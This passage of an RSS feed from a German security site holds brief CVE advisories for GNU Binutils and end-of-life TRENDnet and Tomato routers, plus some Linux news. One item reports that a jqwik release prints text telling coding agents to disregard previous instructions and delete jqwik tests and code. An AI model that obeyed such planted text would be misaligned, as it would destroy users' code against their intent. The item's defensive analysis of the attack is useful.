<link>https://tsecurity.de/de/3560250/sicherheitsluecken/cve-2025-1179-gnu-binutils-243-ld-bfdlibbfdc-bfdputl64-memory-corruption-nessus-id-275490-wid-sec-2026-1730/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560250/sicherheitsluecken/cve-2025-1179-gnu-binutils-243-ld-bfdlibbfdc-bfdputl64-memory-corruption-nessus-id-275490-wid-sec-2026-1730/</guid>
<pubDate>Sun, 31 May 2026 07:53:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/gnu:binutils">GNU Binutils 2.43</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is the function <code>bfd_putl64</code> of the file <em>bfd/libbfd.c</em> of the component <em>ld</em>. This manipulation causes memory corruption.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2025-1179">CVE-2025-1179</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The affected component should be upgraded.

The code maintainer explains, that "[t]his bug has been fixed at some point between the 2.43 and 2.44 releases".]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10160 | TRENDnet TEW-432BRP 3.10B20 formSetEnableWizard start_wizard stack-based overflow (EUVD-2026-33479)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formSetEnableWizard of the file /goform/formSetEnableWizard. Such manipulation of the argument start_wizard leads to stack-based buffer overflow. This vulnerability only affec...]]></description>
<link>https://tsecurity.de/de/3560233/sicherheitsluecken/cve-2026-10160-trendnet-tew-432brp-310b20-formsetenablewizard-startwizard-stack-based-overflow-euvd-2026-33479/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560233/sicherheitsluecken/cve-2026-10160-trendnet-tew-432brp-310b20-formsetenablewizard-startwizard-stack-based-overflow-euvd-2026-33479/</guid>
<pubDate>Sun, 31 May 2026 07:53:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected by this issue is the function <code>formSetEnableWizard</code> of the file <em>/goform/formSetEnableWizard</em>. Such manipulation of the argument <em>start_wizard</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-10160">CVE-2026-10160</a>. The attack can be launched remotely. Moreover, an exploit is present.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10161 | TRENDnet TEW-432BRP 3.10B20 formResetStatistic status_statistic stack-based overflow (EUVD-2026-33480)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in TRENDnet TEW-432BRP 3.10B20. This affects the function formResetStatistic of the file /goform/formResetStatistic. Performing a manipulation of the argument status_statistic results in stack-based buffer overflow. This vulnerability only affe...]]></description>
<link>https://tsecurity.de/de/3560232/sicherheitsluecken/cve-2026-10161-trendnet-tew-432brp-310b20-formresetstatistic-statusstatistic-stack-based-overflow-euvd-2026-33480/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560232/sicherheitsluecken/cve-2026-10161-trendnet-tew-432brp-310b20-formresetstatistic-statusstatistic-stack-based-overflow-euvd-2026-33480/</guid>
<pubDate>Sun, 31 May 2026 07:53:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This affects the function <code>formResetStatistic</code> of the file <em>/goform/formResetStatistic</em>. Performing a manipulation of the argument <em>status_statistic</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-10161">CVE-2026-10161</a>. The attack may be initiated remotely. In addition, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10162 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetPassword webpage stack-based overflow (EUVD-2026-33481)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in TRENDnet TEW-432BRP 3.10B20. This vulnerability affects the function formSetPassword of the file /goform/formSetPassword. Executing a manipulation of the argument webpage can lead to stack-based buffer overflow. This vulnerability only ...]]></description>
<link>https://tsecurity.de/de/3560231/sicherheitsluecken/cve-2026-10162-trendnet-tew-432brp-310b20-goformformsetpassword-webpage-stack-based-overflow-euvd-2026-33481/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560231/sicherheitsluecken/cve-2026-10162-trendnet-tew-432brp-310b20-goformformsetpassword-webpage-stack-based-overflow-euvd-2026-33481/</guid>
<pubDate>Sun, 31 May 2026 07:53:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This vulnerability affects the function <code>formSetPassword</code> of the file <em>/goform/formSetPassword</em>. Executing a manipulation of the argument <em>webpage</em> can lead to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-10162">CVE-2026-10162</a>. The attack may be launched remotely. Furthermore, there is an exploit available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-1152 | GNU Binutils 2.43 ld xstrdup.c xstrdup memory leak (Nessus ID 232164 / WID-SEC-2026-1730)]]></title>
<description><![CDATA[A vulnerability was found in GNU Binutils 2.43. It has been classified as problematic. This affects the function xstrdup of the file xstrdup.c of the component ld. The manipulation leads to memory leak.

This vulnerability is referenced as CVE-2025-1152. Remote exploitation of the attack is possi...]]></description>
<link>https://tsecurity.de/de/3560155/sicherheitsluecken/cve-2025-1152-gnu-binutils-243-ld-xstrdupc-xstrdup-memory-leak-nessus-id-232164-wid-sec-2026-1730/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560155/sicherheitsluecken/cve-2025-1152-gnu-binutils-243-ld-xstrdupc-xstrdup-memory-leak-nessus-id-232164-wid-sec-2026-1730/</guid>
<pubDate>Sun, 31 May 2026 06:49:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/gnu:binutils">GNU Binutils 2.43</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects the function <code>xstrdup</code> of the file <em>xstrdup.c</em> of the component <em>ld</em>. The manipulation leads to memory leak.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2025-1152">CVE-2025-1152</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

It is recommended to apply a patch to fix this issue.

The code maintainer explains: "I'm not going to commit some of the leak fixes I've been working on to the 2.44 branch due to concern that would destabilise ld. All of the reported leaks in this bugzilla have been fixed on binutils master."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10159 | TRENDnet TEW-432BRP 3.10B20 /goform/formSysLog current_page stack-based overflow (EUVD-2026-33478)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSysLog of the file /goform/formSysLog. This manipulation of the argument current_page causes stack-based buffer overflow. This vulnerability only affects pro...]]></description>
<link>https://tsecurity.de/de/3560140/sicherheitsluecken/cve-2026-10159-trendnet-tew-432brp-310b20-goformformsyslog-currentpage-stack-based-overflow-euvd-2026-33478/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560140/sicherheitsluecken/cve-2026-10159-trendnet-tew-432brp-310b20-goformformsyslog-currentpage-stack-based-overflow-euvd-2026-33478/</guid>
<pubDate>Sun, 31 May 2026 06:23:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected by this vulnerability is the function <code>formSysLog</code> of the file <em>/goform/formSysLog</em>. This manipulation of the argument <em>current_page</em> causes stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-10159">CVE-2026-10159</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10158 | TRENDnet TEW-432BRP 3.10B20 /goform/formPortFw server_name stack-based overflow (EUVD-2026-33477)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in TRENDnet TEW-432BRP 3.10B20. Affected is the function formPortFw of the file /goform/formPortFw. The manipulation of the argument server_name results in stack-based buffer overflow. This vulnerability only affects products that are no...]]></description>
<link>https://tsecurity.de/de/3560137/sicherheitsluecken/cve-2026-10158-trendnet-tew-432brp-310b20-goformformportfw-servername-stack-based-overflow-euvd-2026-33477/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560137/sicherheitsluecken/cve-2026-10158-trendnet-tew-432brp-310b20-goformformportfw-servername-stack-based-overflow-euvd-2026-33477/</guid>
<pubDate>Sun, 31 May 2026 06:23:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected is the function <code>formPortFw</code> of the file <em>/goform/formPortFw</em>. The manipulation of the argument <em>server_name</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-10158">CVE-2026-10158</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10119 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetMACFilter filter_name stack-based overflow (EUVD-2026-33461)]]></title>
<description><![CDATA[A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. It has been classified as critical. Impacted is the function formSetMACFilter of the file /goform/formSetMACFilter. The manipulation of the argument filter_name leads to stack-based buffer overflow. This vulnerability only affects products...]]></description>
<link>https://tsecurity.de/de/3560042/sicherheitsluecken/cve-2026-10119-trendnet-tew-432brp-310b20-goformformsetmacfilter-filtername-stack-based-overflow-euvd-2026-33461/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560042/sicherheitsluecken/cve-2026-10119-trendnet-tew-432brp-310b20-goformformsetmacfilter-filtername-stack-based-overflow-euvd-2026-33461/</guid>
<pubDate>Sun, 31 May 2026 04:52:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is the function <code>formSetMACFilter</code> of the file <em>/goform/formSetMACFilter</em>. The manipulation of the argument <em>filter_name</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-10119">CVE-2026-10119</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10120 | TRENDnet TEW-432BRP 3.10B20 formSetFirewallRule firewall_name stack-based overflow (EUVD-2026-33462)]]></title>
<description><![CDATA[A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. It has been declared as critical. The affected element is the function formSetFirewallRule of the file /goform/formSetFirewallRule. The manipulation of the argument firewall_name results in stack-based buffer overflow. This vulnerability o...]]></description>
<link>https://tsecurity.de/de/3560040/sicherheitsluecken/cve-2026-10120-trendnet-tew-432brp-310b20-formsetfirewallrule-firewallname-stack-based-overflow-euvd-2026-33462/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560040/sicherheitsluecken/cve-2026-10120-trendnet-tew-432brp-310b20-formsetfirewallrule-firewallname-stack-based-overflow-euvd-2026-33462/</guid>
<pubDate>Sun, 31 May 2026 04:52:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is the function <code>formSetFirewallRule</code> of the file <em>/goform/formSetFirewallRule</em>. The manipulation of the argument <em>firewall_name</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-10120">CVE-2026-10120</a>. The attack can be executed remotely. Additionally, an exploit exists.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10122 | TRENDnet TEW-432BRP 3.10B20 formSetProtocolFilter protocol_name stack-based overflow (EUVD-2026-33464)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetProtocolFilter of the file /goform/formSetProtocolFilter. Such manipulation of the argument protocol_name leads to stack-based buffer overflow. This vulnerability only affe...]]></description>
<link>https://tsecurity.de/de/3559865/sicherheitsluecken/cve-2026-10122-trendnet-tew-432brp-310b20-formsetprotocolfilter-protocolname-stack-based-overflow-euvd-2026-33464/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559865/sicherheitsluecken/cve-2026-10122-trendnet-tew-432brp-310b20-formsetprotocolfilter-protocolname-stack-based-overflow-euvd-2026-33464/</guid>
<pubDate>Sun, 31 May 2026 02:20:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This affects the function <code>formSetProtocolFilter</code> of the file <em>/goform/formSetProtocolFilter</em>. Such manipulation of the argument <em>protocol_name</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-10122">CVE-2026-10122</a>. The attack may be performed from remote. In addition, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10123 | TRENDnet TEW-432BRP 3.10B20 formSetDomainFilter stack-based overflow (EUVD-2026-33465)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetDomainFilter of the file /goform/formSetDomainFilter. Performing a manipulation of the argument blocked_domain/permitted_domain/blocked_domain_list/permitted_domain_list resul...]]></description>
<link>https://tsecurity.de/de/3559864/sicherheitsluecken/cve-2026-10123-trendnet-tew-432brp-310b20-formsetdomainfilter-stack-based-overflow-euvd-2026-33465/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559864/sicherheitsluecken/cve-2026-10123-trendnet-tew-432brp-310b20-formsetdomainfilter-stack-based-overflow-euvd-2026-33465/</guid>
<pubDate>Sun, 31 May 2026 02:20:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This impacts the function <code>formSetDomainFilter</code> of the file <em>/goform/formSetDomainFilter</em>. Performing a manipulation of the argument <em>blocked_domain/permitted_domain/blocked_domain_list/permitted_domain_list</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-10123">CVE-2026-10123</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10124 | Shibby Tomato up to 1.28 Zserv /usr/sbin/ripd rip_zebra_read_ipv4 stack-based overflow (IJ9FFG / EUVD-2026-33467)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Shibby Tomato up to 1.28. Affected is the function rip_zebra_read_ipv4 of the file /usr/sbin/ripd of the component Zserv Handler. Executing a manipulation can lead to stack-based buffer overflow. This vulnerability only affects products that a...]]></description>
<link>https://tsecurity.de/de/3559863/sicherheitsluecken/cve-2026-10124-shibby-tomato-up-to-128-zserv-usrsbinripd-ripzebrareadipv4-stack-based-overflow-ij9ffg-euvd-2026-33467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559863/sicherheitsluecken/cve-2026-10124-shibby-tomato-up-to-128-zserv-usrsbinripd-ripzebrareadipv4-stack-based-overflow-ij9ffg-euvd-2026-33467/</guid>
<pubDate>Sun, 31 May 2026 02:20:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/shibby:tomato">Shibby Tomato up to 1.28</a>. Affected is the function <code>rip_zebra_read_ipv4</code> of the file <em>/usr/sbin/ripd</em> of the component <em>Zserv Handler</em>. Executing a manipulation can lead to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-10124">CVE-2026-10124</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

This project is superseded by FreshTomato.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10121 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetUrlFilter keyword_list/keyword stack-based overflow (EUVD-2026-33463)]]></title>
<description><![CDATA[A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. It has been rated as critical. The impacted element is the function formSetUrlFilter of the file /goform/formSetUrlFilter. This manipulation of the argument keyword_list/keyword causes stack-based buffer overflow. This vulnerability only a...]]></description>
<link>https://tsecurity.de/de/3559860/sicherheitsluecken/cve-2026-10121-trendnet-tew-432brp-310b20-goformformseturlfilter-keywordlistkeyword-stack-based-overflow-euvd-2026-33463/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559860/sicherheitsluecken/cve-2026-10121-trendnet-tew-432brp-310b20-goformformseturlfilter-keywordlistkeyword-stack-based-overflow-euvd-2026-33463/</guid>
<pubDate>Sun, 31 May 2026 02:19:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is the function <code>formSetUrlFilter</code> of the file <em>/goform/formSetUrlFilter</em>. This manipulation of the argument <em>keyword_list/keyword</em> causes stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-10121">CVE-2026-10121</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10066 | Shibby Tomato up to 1.28 UPS Service tomatoups.cgi sub_9068 stack-based overflow (EUVD-2026-33341)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Shibby Tomato up to 1.28. This issue affects the function sub_9068 of the file tomatoups.cgi of the component UPS Service. The manipulation leads to stack-based buffer overflow. This vulnerability only affects products that are ...]]></description>
<link>https://tsecurity.de/de/3558428/sicherheitsluecken/cve-2026-10066-shibby-tomato-up-to-128-ups-service-tomatoupscgi-sub9068-stack-based-overflow-euvd-2026-33341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558428/sicherheitsluecken/cve-2026-10066-shibby-tomato-up-to-128-ups-service-tomatoupscgi-sub9068-stack-based-overflow-euvd-2026-33341/</guid>
<pubDate>Sat, 30 May 2026 07:37:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/shibby:tomato">Shibby Tomato up to 1.28</a>. This issue affects the function <code>sub_9068</code> of the file <em>tomatoups.cgi</em> of the component <em>UPS Service</em>. The manipulation leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-10066">CVE-2026-10066</a>. The attack can be initiated remotely. There is not any exploit available.

This project is superseded by FreshTomato.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10067 | Shibby Tomato 1.28 multimon.cgi sub_90F0 stack-based overflow (EUVD-2026-33343)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Shibby Tomato 1.28. Impacted is the function sub_90F0 of the file multimon.cgi. The manipulation results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This v...]]></description>
<link>https://tsecurity.de/de/3558230/sicherheitsluecken/cve-2026-10067-shibby-tomato-128-multimoncgi-sub90f0-stack-based-overflow-euvd-2026-33343/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558230/sicherheitsluecken/cve-2026-10067-shibby-tomato-128-multimoncgi-sub90f0-stack-based-overflow-euvd-2026-33343/</guid>
<pubDate>Sat, 30 May 2026 04:35:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/shibby:tomato">Shibby Tomato 1.28</a>. Impacted is the function <code>sub_90F0</code> of the file <em>multimon.cgi</em>. The manipulation results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-10067">CVE-2026-10067</a>. The attack can be launched remotely. No exploit exists.

This project is superseded by FreshTomato.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nesbitt: Protestware for coding agents]]></title>
<description><![CDATA[Andrew Nesbitt has written a blog
post detailing a recent incident with the jqwik library for property-based testing
in Java. On May 25, the 1.10.0 release of jqwik included a change
that attempts to instruct coding agents to disregard previous
instructions and delete jqwik tests and code. 


I t...]]></description>
<link>https://tsecurity.de/de/3557940/linux-tipps/nesbitt-protestware-for-coding-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557940/linux-tipps/nesbitt-protestware-for-coding-agents/</guid>
<pubDate>Sat, 30 May 2026 01:19:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Andrew Nesbitt has written a <a href="https://nesbitt.io/2026/05/28/protestware-for-coding-agents.html">blog
post</a> detailing a recent incident with the <a href="https://jqwik.net/">jqwik</a> library for property-based testing
in Java. On May 25, the 1.10.0 release of jqwik included a <a href="https://github.com/jqwik-team/jqwik/commit/9dddcb5226">change</a>
that attempts to instruct coding agents to disregard previous
instructions and delete jqwik tests and code.</p> 

<blockquote class="bq">
I think this is a new class of supply-chain input worth keeping an eye
on, mostly because of how little of the existing tooling has any
opinion about it. A <tt>System.out.print</tt> of sixty-eight bytes of plain
ASCII isn't the kind of thing scanners are looking for, since those
watch for install hooks, network calls, filesystem writes, obfuscated
strings and the like. The jar makes the same syscalls it made in 1.9,
and because the change was committed and released by the legitimate
maintainer through the normal build, it's clean from a SLSA point of
view too: the provenance is what it should be. Anyone who reads the
diff can see what it does, but a patch bump of a test-scoped
dependency is not where most projects spend their review time.
</blockquote>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canonical takes over Flutter desktop maintenance]]></title>
<description><![CDATA[Google confirmed at Google I/O 2026 that Canonical is the new lead maintainer and ‘strategic steward’ of Flutter desktop for Windows, macOS and Linux. The announcement of an expanded partnership with Canonical came during the ‘What’s new in Flutter’ presentation at Google I/O 2026, where Kate Lov...]]></description>
<link>https://tsecurity.de/de/3557938/linux-tipps/canonical-takes-over-flutter-desktop-maintenance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557938/linux-tipps/canonical-takes-over-flutter-desktop-maintenance/</guid>
<pubDate>Sat, 30 May 2026 01:19:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="406" height="232" src="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2024/05/flutter-ubuntu-1.jpg?resize=406%2C232&amp;ssl=1" class="attachment-post-list size-post-list wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2024/05/flutter-ubuntu-1.jpg?resize=350%2C200&amp;ssl=1 350w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2024/05/flutter-ubuntu-1.jpg?resize=406%2C232&amp;ssl=1 406w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2024/05/flutter-ubuntu-1.jpg?resize=840%2C480&amp;ssl=1 840w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2024/05/flutter-ubuntu-1.jpg?zoom=3&amp;resize=406%2C232&amp;ssl=1 1218w" sizes="(max-width: 406px) 100vw, 406px">Google confirmed at Google I/O 2026 that Canonical is the new lead maintainer and ‘strategic steward’ of Flutter desktop for Windows, macOS and Linux. The announcement of an expanded partnership with Canonical came during the ‘What’s new in Flutter’ presentation at Google I/O 2026, where Kate Lovett, Engineer Manager on the Flutter Framework team at Google, touched on their existing work: “[The Flutter] desktop experience has reached a new level of maturity this year, driven by our incredible engineering partnership with Canonical, the publisher of Ubuntu”. She later confirmed that Canonical’s ‘deep technical expertise’ will now oversee maintenance of Flutter […]</p>
<p>You're reading <a href="https://www.omgubuntu.co.uk/2026/05/flutter-desktop-canonical-maintained">Canonical takes over Flutter desktop maintenance</a>, a blog post from <a href="https://www.omgubuntu.co.uk/">OMG! Ubuntu</a>. Do not reproduce elsewhere without permission.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux-Maintainer Greg Kroah-Hartman erklärt das Rust-Experiment für beendet]]></title>
<description><![CDATA[Greg Kroah-Hartman betont den Wert von Rust für den Linux-Kernel. Die Sprache bereinigt C-Fehler zur Build-Zeit und schützt vor KI-generierten Exploits.

Tags: #Künstliche Intelligenz | #Linux]]></description>
<link>https://tsecurity.de/de/3556661/it-security-nachrichten/linux-maintainer-greg-kroah-hartman-erklaert-das-rust-experiment-fuer-beendet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556661/it-security-nachrichten/linux-maintainer-greg-kroah-hartman-erklaert-das-rust-experiment-fuer-beendet/</guid>
<pubDate>Fri, 29 May 2026 11:35:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
